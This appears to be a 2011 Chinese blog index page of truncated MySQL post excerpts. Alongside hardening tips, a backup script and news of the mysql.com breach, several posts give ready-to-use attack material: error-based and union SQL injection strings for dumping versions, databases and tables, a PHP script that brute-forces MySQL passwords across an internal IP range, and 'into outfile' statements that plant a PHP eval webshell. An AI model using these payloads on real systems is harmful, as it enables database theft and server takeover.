MYSQL高级报错注入

   
分类:安全 | 2011-10-11 | 撸过 1,961 次
0人扯蛋

and (select count(*) from mysql.user)>0/*

 

1、查看MYSQL版本

and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c)

 

2、爆所有库

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x2[......]

继续阅读

Mysql安全设置

   
分类:技术 | 2011-10-5 | 撸过 932 次
0人扯蛋

    MySQL 是一个真正的多用户、多线程SQL数据库服务器,它是一个客户机/服务器结构的实现。MySQL是现在流行的关系数据库中其中的一种,相比其它的数据库管理系统(DBMS)来说,MySQL具有小巧、功能齐全、查询迅捷等优点。MySQL 主要目标是快速、健壮和易用。目前,在大中型企业中已经得到了较好的运用,但是由于它是多平台的数据库,不可避免的默认配置也是适合多种情况的需求,因此需要用户需要在自定义的环境下对MySQL的使用进行加固。

假如软件本身有严重安全问题,即使安全配置做的更好,也没有用。因此,要首先了解MySQL的版本。关于MySQL的版本,在MySQL官方文档中是这么描述的[......]

继续阅读

PHP+MySQL 手工注入语句

   
分类:安全 | 2011-09-30 | 撸过 1,358 次
0人扯蛋

暴字段长度
order by num/*

匹配字段
and 1=1 union select 1,2,3,4,5…….n/*

暴字段位置
and 1=2 union select 1,2,3,4,5…..n/*

利用内置函数暴数据库信息
version() database() user()

不用猜解可用字段暴数据库信息(有些网站不适用):
and 1=2 union all select version() /*
and 1=2 union all select database() /*
and 1=2 union all select user() /*

操作系统信息:
and[......]

继续阅读

MySQL定时备份Windows主机

   
分类:技术 | 2011-09-30 | 撸过 875 次
0人扯蛋

对于Windows主机

  ==============

  假想环境:

  MySQL 安装位置:C:\MySQL

  论坛数据库名称为:bbs

  MySQL root 密码:123456

  数据库备份目的地:D:\db_backup\

  程序代码

  @echo off

  C:\MySQL\bin\mysqladmin -u root --password=123456 shutdown

  C:\MySQL\bin\mysqldump --opt -u root --password=123456 bbs > D:\db_backup\bbs.sql

  C:[......]

继续阅读

mysql官方网站被黑并获得了ROOT权限

   
分类:新闻 | 2011-09-29 | 撸过 1,165 次
0人扯蛋

太牛X了,mysql都被强奸了,世界又开始混乱......

Amorize的安全研究人员最近表示,已经确认黑客入侵mysql.com,并通过iframe的方法

让用户感染了恶意代码,他们已经追踪到佛罗里达和瑞典两个恶意软件托管地,在当地时

间周一下午依然在对mysql.com的访客实施攻击,用户凭据可能已经遭到了窃取,因此

建议mysql.com注册过的用户修改自己与此相同的密码。

更糟的是研究发现,mysql.com的root权限似乎已经开始在俄罗斯的地下黑客论坛挂牌出售,

价格3000美元,黑客们只要给钱就可以获得访问mysql.com的权限,可见问题的糟糕程度。

[......]

继续阅读

(老文章)最棒的10款MySQL管理工具

   
分类:技术 | 2011-09-20 | 撸过 1,022 次
0人扯蛋

绝大多数的关系数据库都明显不同于MS Access,它们都有两个截然不同的部分:后端作为数据仓库,前端作为用于数据组件通信的用户界面。这种设计非常巧妙,它并行处理两层编程模型,将数据层从用户界面中分离出来,同时运行数据库软件制造商专注于它们的产品强项:数据存储和管理。它同时为第三方创建大量的应用程序提供了便利,使各种数据库间的交互性更强。这类产品包括Embarcadero Rapid SQL和Oracle SQL Developer。这里有十款优秀的MySQL图形化界面。
1. Workbench
制造商:Sun Systems/Oracle
网站:http://dev.mysql.com/d[......]

继续阅读

MYSQL服务器猜密码脚本

   
分类:安全 | 2011-09-4 | 撸过 1,129 次
0人扯蛋

昨日渗透时 , 整段都是MYSQL服务器。在某个WEB下。用如下脚本来猜了一下MYSQL密码。还真有两个。在WEB下用脚本来弄也方便快捷。MSSQL的同理。。

这个是已知开了3306的。。

<?php

$hostdb = array(
	'192.168.168.10',
	'192.168.168.20',
	'192.168.168.20',
	'192.168.168.40',
	'192.168.168.50',
	'192.168.168.60',
	'192.168.168.70',
	'192.168.168.80',
	'192.168.168.90',
	'192.[......]

继续阅读

Mysql root导shell

   
分类:安全 | 2011-08-22 | 撸过 1,261 次
1人扯蛋

Select '' into outfile 'E:/wwwroot/china/eval.php';//导shell,访问报错,详情不解select load_file('E:/wwwroot/china/eval.php');//读shell,检查shell完整性http://www.xxxxxxx.cn/eval.php

经过asc码格式导成功了。连接密码,cmd
select concat(char(60),char(63),char(112),char(104),char(112),char(32),char(101),char(118),char(97),char(108),ch[......]

继续阅读

Mysql5+php 注入查看MYSQL基本信息(库名,版本,用户)

   
分类:安全 | 2011-08-22 | 撸过 1,196 次
0人扯蛋

and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
二.查数据库
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
三.暴表
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.T[......]

继续阅读

mysql数据截断

   
分类:安全 | 2011-08-22 | 撸过 1,124 次
0人扯蛋

LengF:在看《PHP高级漏洞审核技术》认真的看了这两点,暂且记下。
对于很多web应用文件在很多功能是不容许重复数据的,比如用户注册功能等。一般的应用程序对于提交注册的username和数据库里已有的username对比是不是已经有重复数据,然而我们可以通过“数据截断”等来饶过这些判断,数据库在处理时候产生截断导致插入重复数据。

1) Mysql SQL Column Truncation Vulnerabilities

这个漏洞又是大牛Stefan Esser发现的(Stefan Esser是我的偶像:)),这个是由于mysql的sql_mode设置为default的时候,即没有开启[......]

继续阅读